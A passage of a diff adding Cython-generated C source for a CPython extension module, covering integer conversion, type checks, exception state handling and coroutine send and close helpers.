> 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject* exc_type2) { + PyObject *exception, *value, *tb; + int res; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&exception, &value, &tb); + res = exc_type1 ? PyObject_IsSubclass(err, exc_type1) : 0; + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + if (!res) { + res = PyObject_IsSubclass(err, exc_type2); + if (unlikely(res == -1)) { + PyErr_WriteUnraisable(err); + res = 0; + } + } + __Pyx_ErrRestore(exception, value, tb); + return res; +} +#else +static CYTHON_INLINE int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject *err, PyObject* exc_type1, PyObject *exc_type2) { + if (exc_type1) { + return __Pyx_IsAnySubtype2((PyTypeObject*)err, (PyTypeObject*)exc_type1, (PyTypeObject*)exc_type2); + } else { + return __Pyx_IsSubtype((PyTypeObject*)err, (PyTypeObject*)exc_type2); + } +} +#endif +static int __Pyx_PyErr_GivenExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + assert(PyExceptionClass_Check(exc_type)); + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; iexc_info; + while ((exc_info->exc_value == NULL || exc_info->exc_value == Py_None) && + exc_info->previous_item != NULL) + { + exc_info = exc_info->previous_item; + } + return exc_info; +} +#endif + +/* SaveResetException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + PyObject *exc_value = exc_info->exc_value; + if (exc_value == NULL || exc_value == Py_None) { + *value = NULL; + *type = NULL; + *tb = NULL; + } else { + *value = exc_value; + Py_INCREF(*value); + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + *tb = PyException_GetTraceback(exc_value); + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + *type = exc_info->exc_type; + *value = exc_info->exc_value; + *tb = exc_info->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #else + *type = tstate->exc_type; + *value = tstate->exc_value; + *tb = tstate->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #endif +} +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + PyObject *tmp_value = exc_info->exc_value; + exc_info->exc_value = value; + Py_XDECREF(tmp_value); + Py_XDECREF(type); + Py_XDECREF(tb); + #else + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = type; + exc_info->exc_value = value; + exc_info->exc_traceback = tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = type; + tstate->exc_value = value; + tstate->exc_traceback = tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); + #endif +} +#endif + +/* SwapException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_value = exc_info->exc_value; + exc_info->exc_value = *value; + if (tmp_value == NULL || tmp_value == Py_None) { + Py_XDECREF(tmp_value); + tmp_value = NULL; + tmp_type = NULL; + tmp_tb = NULL; + } else { + tmp_type = (PyObject*) Py_TYPE(tmp_value); + Py_INCREF(tmp_type); + #if CYTHON_COMPILING_IN_CPYTHON + tmp_tb = ((PyBaseExceptionObject*) tmp_value)->traceback; + Py_XINCREF(tmp_tb); + #else + tmp_tb = PyException_GetTraceback(tmp_value); + #endif + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = *type; + exc_info->exc_value = *value; + exc_info->exc_traceback = *tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = *type; + tstate->exc_value = *value; + tstate->exc_traceback = *tb; + #endif + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_GetExcInfo(&tmp_type, &tmp_value, &tmp_tb); + PyErr_SetExcInfo(*type, *value, *tb); + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#endif + +/* PyObjectCall2Args */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2) { + PyObject *args[3] = {NULL, arg1, arg2}; + return __Pyx_PyObject_FastCall(function, args+1, 2 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectCallMethod1 */ +static PyObject* __Pyx__PyObject_CallMethod1(PyObject* method, PyObject* arg) { + PyObject *result = __Pyx_PyObject_CallOneArg(method, arg); + Py_DECREF(method); + return result; +} +static PyObject* __Pyx_PyObject_CallMethod1(PyObject* obj, PyObject* method_name, PyObject* arg) { + PyObject *method = NULL, *result; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_Call2Args(method, obj, arg); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) return NULL; + return __Pyx__PyObject_CallMethod1(method, arg); +} + +/* CoroutineBase */ +#include +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#define __Pyx_Coroutine_Undelegate(gen) Py_CLEAR((gen)->yieldfrom) +static int __Pyx_PyGen__FetchStopIterationValue(PyThreadState *__pyx_tstate, PyObject **pvalue) { + PyObject *et, *ev, *tb; + PyObject *value = NULL; + CYTHON_UNUSED_VAR(__pyx_tstate); + __Pyx_ErrFetch(&et, &ev, &tb); + if (!et) { + Py_XDECREF(tb); + Py_XDECREF(ev); + Py_INCREF(Py_None); + *pvalue = Py_None; + return 0; + } + if (likely(et == PyExc_StopIteration)) { + if (!ev) { + Py_INCREF(Py_None); + value = Py_None; + } +#if PY_VERSION_HEX >= 0x030300A0 + else if (likely(__Pyx_IS_TYPE(ev, (PyTypeObject*)PyExc_StopIteration))) { + value = ((PyStopIterationObject *)ev)->value; + Py_INCREF(value); + Py_DECREF(ev); + } +#endif + else if (unlikely(PyTuple_Check(ev))) { + if (PyTuple_GET_SIZE(ev) >= 1) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + value = PyTuple_GET_ITEM(ev, 0); + Py_INCREF(value); +#else + value = PySequence_ITEM(ev, 0); +#endif + } else { + Py_INCREF(Py_None); + value = Py_None; + } + Py_DECREF(ev); + } + else if (!__Pyx_TypeCheck(ev, (PyTypeObject*)PyExc_StopIteration)) { + value = ev; + } + if (likely(value)) { + Py_XDECREF(tb); + Py_DECREF(et); + *pvalue = value; + return 0; + } + } else if (!__Pyx_PyErr_GivenExceptionMatches(et, PyExc_StopIteration)) { + __Pyx_ErrRestore(et, ev, tb); + return -1; + } + PyErr_NormalizeException(&et, &ev, &tb); + if (unlikely(!PyObject_TypeCheck(ev, (PyTypeObject*)PyExc_StopIteration))) { + __Pyx_ErrRestore(et, ev, tb); + return -1; + } + Py_XDECREF(tb); + Py_DECREF(et); +#if PY_VERSION_HEX >= 0x030300A0 + value = ((PyStopIterationObject *)ev)->value; + Py_INCREF(value); + Py_DECREF(ev); +#else + { + PyObject* args = __Pyx_PyObject_GetAttrStr(ev, __pyx_n_s_args); + Py_DECREF(ev); + if (likely(args)) { + value = PySequence_GetItem(args, 0); + Py_DECREF(args); + } + if (unlikely(!value)) { + __Pyx_ErrRestore(NULL, NULL, NULL); + Py_INCREF(Py_None); + value = Py_None; + } + } +#endif + *pvalue = value; + return 0; +} +static CYTHON_INLINE +void __Pyx_Coroutine_ExceptionClear(__Pyx_ExcInfoStruct *exc_state) { +#if PY_VERSION_HEX >= 0x030B00a4 + Py_CLEAR(exc_state->exc_value); +#else + PyObject *t, *v, *tb; + t = exc_state->exc_type; + v = exc_state->exc_value; + tb = exc_state->exc_traceback; + exc_state->exc_type = NULL; + exc_state->exc_value = NULL; + exc_state->exc_traceback = NULL; + Py_XDECREF(t); + Py_XDECREF(v); + Py_XDECREF(tb); +#endif +} +#define __Pyx_Coroutine_AlreadyRunningError(gen) (__Pyx__Coroutine_AlreadyRunningError(gen), (PyObject*)NULL) +static void __Pyx__Coroutine_AlreadyRunningError(__pyx_CoroutineObject *gen) { + const char *msg; + CYTHON_MAYBE_UNUSED_VAR(gen); + if ((0)) { + #ifdef __Pyx_Coroutine_USED + } else if (__Pyx_Coroutine_Check((PyObject*)gen)) { + msg = "coroutine already executing"; + #endif + #ifdef __Pyx_AsyncGen_USED + } else if (__Pyx_AsyncGen_CheckExact((PyObject*)gen)) { + msg = "async generator already executing"; + #endif + } else { + msg = "generator already executing"; + } + PyErr_SetString(PyExc_ValueError, msg); +} +#define __Pyx_Coroutine_NotStartedError(gen) (__Pyx__Coroutine_NotStartedError(gen), (PyObject*)NULL) +static void __Pyx__Coroutine_NotStartedError(PyObject *gen) { + const char *msg; + CYTHON_MAYBE_UNUSED_VAR(gen); + if ((0)) { + #ifdef __Pyx_Coroutine_USED + } else if (__Pyx_Coroutine_Check(gen)) { + msg = "can't send non-None value to a just-started coroutine"; + #endif + #ifdef __Pyx_AsyncGen_USED + } else if (__Pyx_AsyncGen_CheckExact(gen)) { + msg = "can't send non-None value to a just-started async generator"; + #endif + } else { + msg = "can't send non-None value to a just-started generator"; + } + PyErr_SetString(PyExc_TypeError, msg); +} +#define __Pyx_Coroutine_AlreadyTerminatedError(gen, value, closing) (__Pyx__Coroutine_AlreadyTerminatedError(gen, value, closing), (PyObject*)NULL) +static void __Pyx__Coroutine_AlreadyTerminatedError(PyObject *gen, PyObject *value, int closing) { + CYTHON_MAYBE_UNUSED_VAR(gen); + CYTHON_MAYBE_UNUSED_VAR(closing); + #ifdef __Pyx_Coroutine_USED + if (!closing && __Pyx_Coroutine_Check(gen)) { + PyErr_SetString(PyExc_RuntimeError, "cannot reuse already awaited coroutine"); + } else + #endif + if (value) { + #ifdef __Pyx_AsyncGen_USED + if (__Pyx_AsyncGen_CheckExact(gen)) + PyErr_SetNone(__Pyx_PyExc_StopAsyncIteration); + else + #endif + PyErr_SetNone(PyExc_StopIteration); + } +} +static +PyObject *__Pyx_Coroutine_SendEx(__pyx_CoroutineObject *self, PyObject *value, int closing) { + __Pyx_PyThreadState_declare + PyThreadState *tstate; + __Pyx_ExcInfoStruct *exc_state; + PyObject *retval; + assert(!self->is_running); + if (unlikely(self->resume_label == 0)) { + if (unlikely(value && value != Py_None)) { + return __Pyx_Coroutine_NotStartedError((PyObject*)self); + } + } + if (unlikely(self->resume_label == -1)) { + return __Pyx_Coroutine_AlreadyTerminatedError((PyObject*)self, value, closing); + } +#if CYTHON_FAST_THREAD_STATE + __Pyx_PyThreadState_assign + tstate = __pyx_tstate; +#else + tstate = __Pyx_PyThreadState_Current; +#endif + exc_state = &self->gi_exc_state; + if (exc_state->exc_value) { + #if CYTHON_COMPILING_IN_PYPY + #else + PyObject *exc_tb; + #if PY_VERSION_HEX >= 0x030B00a4 && !CYTHON_COMPILING_IN_CPYTHON + exc_tb = PyException_GetTraceback(exc_state->exc_value); + #elif PY_VERSION_HEX >= 0x030B00a4 + exc_tb = ((PyBaseExceptionObject*) exc_state->exc_value)->traceback; + #else + exc_tb = exc_state->exc_traceback; + #endif + if (exc_tb) { + PyTracebackObject *tb = (PyTracebackObject *) exc_tb; + PyFrameObject *f = tb->tb_frame; + assert(f->f_back == NULL); + #if PY_VERSION_HEX >= 0x030B00A1 + f->f_back = PyThreadState_GetFrame(tstate); + #else + Py_XINCREF(tstate->frame); + f->f_back = tstate->frame; + #endif + #if PY_VERSION_HEX >= 0x030B00a4 && !CYTHON_COMPILING_IN_CPYTHON + Py_DECREF(exc_tb); + #endif + } + #endif + } +#if CYTHON_USE_EXC_INFO_STACK + exc_state->previous_item = tstate->exc_info; + tstate->exc_info = exc_state; +#else + if (exc_state->exc_type) { + __Pyx_ExceptionSwap(&exc_state->exc_type, &exc_state->exc_value, &exc_state->exc_traceback); + } else { + __Pyx_Coroutine_ExceptionClear(exc_state); + __Pyx_ExceptionSave(&exc_state->exc_type, &exc_state->exc_value, &exc_state->exc_traceback); + } +#endif + self->is_running = 1; + retval = self->body(self, tstate, value); + self->is_running = 0; +#if CYTHON_USE_EXC_INFO_STACK + exc_state = &self->gi_exc_state; + tstate->exc_info = exc_state->previous_item; + exc_state->previous_item = NULL; + __Pyx_Coroutine_ResetFrameBackpointer(exc_state); +#endif + return retval; +} +static CYTHON_INLINE void __Pyx_Coroutine_ResetFrameBackpointer(__Pyx_ExcInfoStruct *exc_state) { +#if CYTHON_COMPILING_IN_PYPY + CYTHON_UNUSED_VAR(exc_state); +#else + PyObject *exc_tb; + #if PY_VERSION_HEX >= 0x030B00a4 + if (!exc_state->exc_value) return; + exc_tb = PyException_GetTraceback(exc_state->exc_value); + #else + exc_tb = exc_state->exc_traceback; + #endif + if (likely(exc_tb)) { + PyTracebackObject *tb = (PyTracebackObject *) exc_tb; + PyFrameObject *f = tb->tb_frame; + Py_CLEAR(f->f_back); + #if PY_VERSION_HEX >= 0x030B00a4 + Py_DECREF(exc_tb); + #endif + } +#endif +} +static CYTHON_INLINE +PyObject *__Pyx_Coroutine_MethodReturn(PyObject* gen, PyObject *retval) { + CYTHON_MAYBE_UNUSED_VAR(gen); + if (unlikely(!retval)) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (!__Pyx_PyErr_Occurred()) { + PyObject *exc = PyExc_StopIteration; + #ifdef __Pyx_AsyncGen_USED + if (__Pyx_AsyncGen_CheckExact(gen)) + exc = __Pyx_PyExc_StopAsyncIteration; + #endif + __Pyx_PyErr_SetNone(exc); + } + } + return retval; +} +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03030000 && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) +static CYTHON_INLINE +PyObject *__Pyx_PyGen_Send(PyGenObject *gen, PyObject *arg) { +#if PY_VERSION_HEX <= 0x030A00A1 + return _PyGen_Send(gen, arg); +#else + PyObject *result; + if (PyIter_Send((PyObject*)gen, arg ? arg : Py_None, &result) == PYGEN_RETURN) { + if (PyAsyncGen_CheckExact(gen)) { + assert(result == Py_None); + PyErr_SetNone(PyExc_StopAsyncIteration); + } + else if (result == Py_None) { + PyErr_SetNone(PyExc_StopIteration); + } + else { + _PyGen_SetStopIterationValue(result); + } + Py_CLEAR(result); + } + return result; +#endif +} +#endif +static CYTHON_INLINE +PyObject *__Pyx_Coroutine_FinishDelegation(__pyx_CoroutineObject *gen) { + PyObject *ret; + PyObject *val = NULL; + __Pyx_Coroutine_Undelegate(gen); + __Pyx_PyGen__FetchStopIterationValue(__Pyx_PyThreadState_Current, &val); + ret = __Pyx_Coroutine_SendEx(gen, val, 0); + Py_XDECREF(val); + return ret; +} +static PyObject *__Pyx_Coroutine_Send(PyObject *self, PyObject *value) { + PyObject *retval; + __pyx_CoroutineObject *gen = (__pyx_CoroutineObject*) self; + PyObject *yf = gen->yieldfrom; + if (unlikely(gen->is_running)) + return __Pyx_Coroutine_AlreadyRunningError(gen); + if (yf) { + PyObject *ret; + gen->is_running = 1; + #ifdef __Pyx_Generator_USED + if (__Pyx_Generator_CheckExact(yf)) { + ret = __Pyx_Coroutine_Send(yf, value); + } else + #endif + #ifdef __Pyx_Coroutine_USED + if (__Pyx_Coroutine_Check(yf)) { + ret = __Pyx_Coroutine_Send(yf, value); + } else + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_PyAsyncGenASend_CheckExact(yf)) { + ret = __Pyx_async_gen_asend_send(yf, value); + } else + #endif + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03030000 && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) + if (PyGen_CheckExact(yf)) { + ret = __Pyx_PyGen_Send((PyGenObject*)yf, value == Py_None ? NULL : value); + } else + #endif + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03050000 && defined(PyCoro_CheckExact) && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) + if (PyCoro_CheckExact(yf)) { + ret = __Pyx_PyGen_Send((PyGenObject*)yf, value == Py_None ? NULL : value); + } else + #endif + { + if (value == Py_None) + ret = __Pyx_PyObject_GetIterNextFunc(yf)(yf); + else + ret = __Pyx_PyObject_CallMethod1(yf, __pyx_n_s_send, value); + } + gen->is_running = 0; + if (likely(ret)) { + return ret; + } + retval = __Pyx_Coroutine_FinishDelegation(gen); + } else { + retval = __Pyx_Coroutine_SendEx(gen, value, 0); + } + return __Pyx_Coroutine_MethodReturn(self, retval); +} +static int __Pyx_Coroutine_CloseIter(__pyx_CoroutineObject *gen, PyObject *yf) { + PyObject *retval = NULL; + int err = 0; + #ifdef __Pyx_Generator_USED + if (__Pyx_Generator_CheckExact(yf)) { + retval = __Pyx_Coroutine_Close(yf); + if (!retval) + return -1; + } else + #endif + #ifdef __Pyx_Coroutine_USED + if (__Pyx_Coroutine_Check(yf)) { + retval = __Pyx_Coroutine_Close(yf); + if (!retval) + return -1; + } else + if (__Pyx_CoroutineAwait_CheckExact(yf)) { + retval = __Pyx_CoroutineAwait_Close((__pyx_CoroutineAwaitObject*)yf, NULL); + if (!retval) + return -1; + } else + #endif + #ifdef 